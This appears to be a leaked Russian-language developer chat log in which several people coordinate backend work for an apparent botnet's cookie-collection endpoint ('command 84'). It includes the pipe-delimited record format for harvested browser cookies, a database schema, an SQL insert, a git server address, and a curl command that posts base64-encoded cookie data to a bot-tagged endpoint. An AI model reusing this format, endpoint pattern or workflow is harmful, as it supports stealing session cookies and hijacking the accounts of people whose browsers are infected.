Разделитель строк - может быть как UNIX, так и DOS.
Одна строка - одна запись.
Разделитель полей в записи - вертикальная черта |
Формат записи:

username|browser|domain|cookie_name|cookie_value|created|expires|path\r\n

где

username     - имя пользователя
browser      - код броузера (enum = chrome|ff|ie|edge)
domain       - домен куки
cookie_name  - имя куки
cookie_value - значение куки
created      - дата-время создания, Unix time
expires      - дата-время истечения, Unix time
path         - путь URI
2021-08-31 09:26:49.565737	ttrr	defender	К тому, что у меня не было этого дока. Где описание В64? Это часть формата.
2021-08-31 09:28:37.306277	ttrr	defender	нету про базе64 .. сами добавили очевидно
2021-08-31 09:28:51.257365	ttrr	defender	чтобы экранировать символы
2021-08-31 09:29:50.576629	ttrr	defender	Ну, вот это и нужно в доку добавить.
created у нас в секундах?
2021-08-31 09:30:27.366813	ttrr	defender	created_at я ставлю сам как NOW()
2021-08-31 09:30:36.634794	ttrr	defender	Не догадываться же, как там отстойник обрабатывает, верно?
2021-08-31 09:31:00.358719	ttrr	defender	а .есть другой ..
2021-08-31 09:31:02.578667	ttrr	defender	щас посмотрю
2021-08-31 09:31:21.647778	ttrr	defender	А NOW() в секундах?
2021-08-31 09:32:35.414119	ttrr	defender	забей на NOW() это другое
2021-08-31 09:36:27.495035	ttrr	defender	CREATE TABLE public.data84 (
    id_low bigint NOT NULL,
    id_high bigint NOT NULL,
    "group" character varying(64),
    created_at timestamp without time zone,
    username text,
    browser text,
    domain text,
    cookie_name text,
    cookie_value text,
    created text,
    expires text,
    path text
);
2021-08-31 09:36:31.361021	ttrr	defender	вот таблица
2021-08-31 09:36:37.402817	ttrr	defender	created - просто текст
2021-08-31 09:36:41.644193	ttrr	defender	нету про базе64 .. сами добавили очевидно 
Ну, не для всех очевидно ) У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно.
2021-08-31 09:36:43.346981	ttrr	defender	всё - просто текст
2021-08-31 09:37:34.039310	ttrr	defender	> У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно.  
очевидно не я один это добавлял и не только на моей стороне, иначе не работало бы.
коду уже 5 лет
2021-08-31 09:39:30.948145	ttrr	defender	Ну, это тоже не очевидно)
По факту ошибки посыпались. Документация не полная.
2021-08-31 09:41:31.312828	ttrr	defender	где же ты был )
2021-08-31 10:40:22.320570	ttrr	defender	Zulas ты под новые поля базу тоже будешь менять?
Если да то просьба этого не делать, я веду миграции и хотелось бы чтобы все изменения в базе в них были отражены.
2021-08-31 10:40:58.852141	ttrr	defender	Я написал миграции под два поля secure и httponly
2021-08-31 10:41:19.038272	ttrr	defender	Оба логических.
2021-08-31 10:41:50.950363	ttrr	defender	не буду делать .
2021-08-31 10:41:53.237265	ttrr	defender	и в 90 команду добавились новые поля
2021-08-31 10:42:06.306021	ttrr	defender	ты базу на рабочем уже поменял ?я могу слить дамп ?
2021-08-31 10:42:24.069299	ttrr	defender	поля не будут сохраняться, если их больше?
2021-08-31 10:42:41.758287	ttrr	defender	dlls, programs, services Я тоже уже добавил
2021-08-31 10:42:55.647194	ttrr	defender	а, ок
2021-08-31 10:42:55.698034	ttrr	defender	Пока не накатил, сек сделаю
2021-08-31 10:44:25.981563	ttrr	defender	Там поле под ярлыки desktop нужно еще, но пока не добавил его в миграцию.
2021-08-31 10:44:38.107805	ttrr	defender	И в бэке его тоже вроде как нет
2021-08-31 10:44:40.984539	ttrr	defender	добавляй сразу всё чтобы мне не возвращаться
2021-08-31 10:46:16.068337	ttrr	defender	Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
2021-08-31 11:01:29.510353	ttrr	defender	По 2м полям в куках накатил миграции.
2021-08-31 14:33:07.582183	ttrr	defender	такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. 
В бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.
2021-08-31 14:34:45.524603	ttrr	defender	хороший вопрос, но зуласа нету в конфе уже
2021-08-31 14:34:50.756601	ttrr	defender	потому повтори этот вопрос как он появится
2021-08-31 14:35:16.318691	ttrr	defender	Оке, тут получается нет истории..
2021-08-31 14:35:52.754515	ttrr	defender	неа
2021-08-31 15:23:57.159786	defender	ttrr	для того чтобы не заходить постоянно в конфу после релогина вверху есть звездочка, нажмите 2 раза и выберите автовход - всегда
2021-08-31 15:23:57.161644	ttrr	defender	для того чтобы не заходить постоянно в конфу после релогина вверху есть звездочка, нажмите 2 раза и выберите автовход - всегда
2021-08-31 15:24:14.675069	defender	ttrr	потом когда конфа будет не актуальна звездочку снимите
2021-08-31 15:24:14.676548	ttrr	defender	потом когда конфа будет не актуальна звездочку снимите
2021-09-01 05:41:44.673769	ttrr	defender	 > такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. 
В бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.

для начала что за запрос ? можем мы его повторить на текущей системе чтобы я его видел ?
2021-09-01 06:33:17.312607	ttrr	defender	oad
2021-09-01 13:51:45.506509	ttrr	defender	К сожалению не можем.
Если с этим серверм будет такое же история я напишу
2021-09-01 13:52:07.165112	ttrr	defender	Как повторить к сожалению не знаю пока
2021-09-02 11:28:45.757349	defender	ttrr	всем привет
2021-09-02 11:28:45.759906	ttrr	defender	всем привет
2021-09-02 11:28:50.923026	defender	ttrr	как дела с деро?
2021-09-02 11:28:50.924121	ttrr	defender	как дела с деро?
2021-09-02 11:29:03.152818	defender	ttrr	zulas: понятна проблема?
2021-09-02 11:29:03.155545	ttrr	defender	zulas: понятна проблема?
2021-09-02 11:30:43.882744	ttrr	defender	деф . привет .. а в чем проблема ?
2021-09-02 11:33:13.541684	defender	ttrr	driver: отпиши что ты мне написал сюда
2021-09-02 11:33:13.543622	ttrr	defender	driver: отпиши что ты мне написал сюда
2021-09-02 11:33:20.361151	defender	ttrr	ответ 403 был
2021-09-02 11:33:20.362898	ttrr	defender	ответ 403 был
2021-09-02 11:33:26.015033	defender	ttrr	с ним разобрались?
2021-09-02 11:33:26.026282	ttrr	defender	с ним разобрались?
2021-09-02 11:36:33.217378	ttrr	defender	Бэк отвечает 403 на попытку отправить куки.
2021-09-02 11:36:55.083153	ttrr	defender	Внесли ли изменения связанные с новыми полями?
2021-09-02 11:38:21.041876	defender	ttrr	давайте конкретно: кто и что должен внести?
2021-09-02 11:38:21.044002	ttrr	defender	давайте конкретно: кто и что должен внести?
2021-09-02 11:38:32.051141	defender	ttrr	тк походу зулас даже не в курсе
2021-09-02 11:38:32.052719	ttrr	defender	тк походу зулас даже не в курсе
2021-09-02 11:39:06.176087	defender	ttrr	4ый день мы тут что то обсуждаем, а в итоге ничего не делаем
2021-09-02 11:39:06.178820	ttrr	defender	4ый день мы тут что то обсуждаем, а в итоге ничего не делаем
2021-09-02 11:39:10.283169	defender	ttrr	в чем проблема?
2021-09-02 11:39:10.283820	ttrr	defender	в чем проблема?
2021-09-02 11:39:34.329106	ttrr	defender	Нужно в 84 команду внести 2 поля.
secure, httponly в конец приема, получается 9 и 10 поле должно быть.
2021-09-02 11:39:51.360366	ttrr	defender	В базу должны записываться поля с такими же именами
2021-09-02 11:41:12.878830	ttrr	defender	я ничего не вносил пока ..
2021-09-02 11:41:48.447933	ttrr	defender	так уже пора внести
2021-09-02 11:41:53.194417	ttrr	defender	драйвер же просил
2021-09-02 11:42:05.654301	ttrr	defender	у нас доработка прямо сейчас в модуле сбора, требует этого
2021-09-02 11:42:10.206567	ttrr	defender	Ок. Когда?
2021-09-02 11:43:37.294119	ttrr	defender	Я не стал этого делать потому что мне сказали, что сейчас zulas занимается бэком, но я напрямую не писал задачу.
Возможно решил что вы с кодером модуля обсудили этот момент
2021-09-02 11:44:33.236742	ttrr	defender	(31.08.2021 13:44:35) zulas: добавляй сразу всё чтобы мне не возвращаться
(31.08.2021 13:46:11) driver: Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
(31.08.2021 14:01:24) driver: По 2м полям в куках накатил миграции.
2021-09-02 11:44:45.183947	ttrr	defender	ну вообще надо все сразу сделать и чтобы не возвращаться
2021-09-02 11:44:52.284559	ttrr	defender	переключение контекста -- очень тяжелая операция )
2021-09-02 11:45:14.306425	ttrr	defender	так что 
1. я жду когда в базу нужное внесется
2. когда мне будет объяснено что нужно делать
2021-09-02 11:59:16.910566	ttrr	defender	так а по-моему driver говорил что накатил миграции на базу. Это не оно?
цитату не приведу, уплыло в истории
2021-09-02 12:03:26.091997	ttrr	defender	driver: поясни мне чего ты ждешь?
2021-09-02 12:03:33.363744	ttrr	defender	что нужно от зуласа?
2021-09-02 12:11:37.698547	ttrr	defender	Дело в том что миграция по десктопу относится к другой задаче.
2021-09-02 12:11:51.013999	ttrr	defender	Сейчас нужно сделать 2 этих поля
2021-09-02 12:12:18.868609	ttrr	defender	zulas: сделаешь?
2021-09-02 12:14:06.096712	ttrr	defender	Более того к другой команде и к другой таблице.
2021-09-02 12:15:43.895305	ttrr	defender	@driver давай конкретно что тебе надо и куда ... ок ?
2021-09-02 12:17:36.621722	ttrr	defender	Нужно в 84 команду внести 2 поля.
secure, httponly в конец приема, получается 9 и 10 поле должно быть.
2021-09-02 12:18:22.061065	ttrr	defender	На запрос вида 
curl -X POST -F 'data=dXNlcg==|IE||||1240428288|1240428288|dXNlcg==|IE|demdex.net|ZGVtZGV4|NTczODQzMjMyMTAwNDg1MDEyMDI3NjIxMTIxODA0ODI1OTMyMjQ=|1240428358|1240428358|Lw==|1|1' http://(IP)/TAG/TEST_W639600.1234A242341C6D1A25B3F315D688968E/84/
Должно ответить /1/
2021-09-02 12:20:09.144846	ttrr	defender	ок .. сейчас в базе поля уже есть ?
2021-09-02 12:20:19.948898	ttrr	defender	Да
2021-09-02 12:28:19.570136	ttrr	defender	а старые клиенты еще работают ?
2021-09-02 12:28:40.296322	ttrr	defender	т.е. надо поддерживать и старый формат и новый ?
2021-09-02 12:29:44.531925	ttrr	defender	Нет, просто только новый должен начать работать.
2021-09-02 12:30:37.242016	ttrr	defender	Уже внесли нужные изменения для клиентов. Ждем именно чтобы подхватило эти изменения часть по бэку
2021-09-02 12:59:04.941272	defender	ttrr	zulas: очень прошу поторопиться, так как сейчас от тебя зависит работа многих, без правок бекенда не можем дальше двинуться
2021-09-02 12:59:04.943580	ttrr	defender	zulas: очень прошу поторопиться, так как сейчас от тебя зависит работа многих, без правок бекенда не можем дальше двинуться
2021-09-02 13:03:56.539253	ttrr	defender	хорошо сделаю
2021-09-02 13:23:09.881355	ttrr	defender	[ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path, Secure, HttpOnly ]
2021-09-02 13:23:13.463009	ttrr	defender	такая последовательность ?
2021-09-02 13:23:20.882606	ttrr	defender	@driver
2021-09-02 13:26:57.392704	ttrr	defender	@defender как мне запушить изменения ?
2021-09-02 13:37:09.260603	ttrr	defender	Да все верно.
2021-09-02 14:18:44.634039	defender	ttrr	zulas: а я тебе вроде выдавал доступ, разве нет?
2021-09-02 14:18:44.635291	ttrr	defender	zulas: а я тебе вроде выдавал доступ, разве нет?
2021-09-02 16:43:17.462026	ttrr	defender	я его 100 раз забыл
2021-09-02 16:43:37.841006	ttrr	defender	~/erl/dero> git -c credential.helper=/usr/share/smartgit/lib/credentials.sh push --porcelain --progress --recurse-submodules=check origin refs/heads/master:refs/heads/master
unable to access 'https://179.43.147.243/begemot/dero.git/': gnutls_handshake() failed: Internal error
2021-09-02 16:44:19.024032	defender	ttrr	ок, щас в личку кину
2021-09-02 16:44:19.025270	ttrr	defender	ок, щас в личку кину
2021-09-03 09:27:34.709846	ttrr	defender	Добрый день! Как успехи по пушу кода?
2021-09-03 09:28:03.395986	ttrr	defender	@zulas @defender
2021-09-03 09:28:22.264709	ttrr	defender	надо запушить . жду дефа
2021-09-03 09:31:17.966911	ttrr	defender	Ок
2021-09-03 11:49:56.197033	ttrr	defender	А есть вариант просто на сервер залить этот код пока что?
2021-09-03 11:50:22.704406	ttrr	defender	Чтобы мы потестили, а с гитом позже разобраться7
2021-09-03 11:57:50.001700	defender	ttrr	зулас запушил
2021-09-03 11:57:50.003568	ttrr	defender	зулас запушил
2021-09-03 11:57:56.216523	defender	ttrr	я его попросил выгрузить на сервер
2021-09-03 11:57:56.217507	ttrr	defender	я его попросил выгрузить на сервер
2021-09-03 11:58:32.834690	defender	ttrr	 driver или ты выгрузи сам
2021-09-03 11:58:32.836363	ttrr	defender	 driver или ты выгрузи сам
2021-09-03 12:17:17.909945	ttrr	defender	Ок
2021-09-03 12:17:26.286983	ttrr	defender	Выгружу.
2021-09-03 12:54:25.745267	ttrr	defender	SQL = "INSERT INTO data84 (created_at, \"group\", id_low, id_high, username, browser, \"domain\", cookie_name, cookie_value, created, expires, path ) VALUES ( NOW(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13 )",
2021-09-03 12:55:03.220705	ttrr	defender	@zulas не вставил 2 поля в запрос в базу.
2021-09-03 12:55:17.837474	ttrr	defender	Поправь пожалуйста.
2021-09-03 13:02:44.309362	ttrr	defender	И таблицу архива куков, там тоже эти 2 поля нужны будут.
2021-09-03 13:03:34.027532	ttrr	defender	По остальному посмотрел, вижу схему нормальную сделал, все ок. Это у нас недавно было актуальной проблемой.
2021-09-03 13:04:19.044728	ttrr	defender	cookies_archive*
2021-09-03 13:23:45.181934	ttrr	defender	zulas отпиши по времени, когда сможешь сделать фиксы
2021-09-03 13:44:34.795816	ttrr	defender	щас посмотрю
2021-09-03 13:46:05.458181	ttrr	defender	@driver cookies_archive* .. я такой таблицей не пользуюсь
2021-09-03 13:56:14.444667	ttrr	defender	пофиксил запрос
2021-09-03 13:56:17.183368	ttrr	defender	не тестировал
2021-09-04 06:50:20.177709	ttrr	defender	сегодня отдых у всех ?
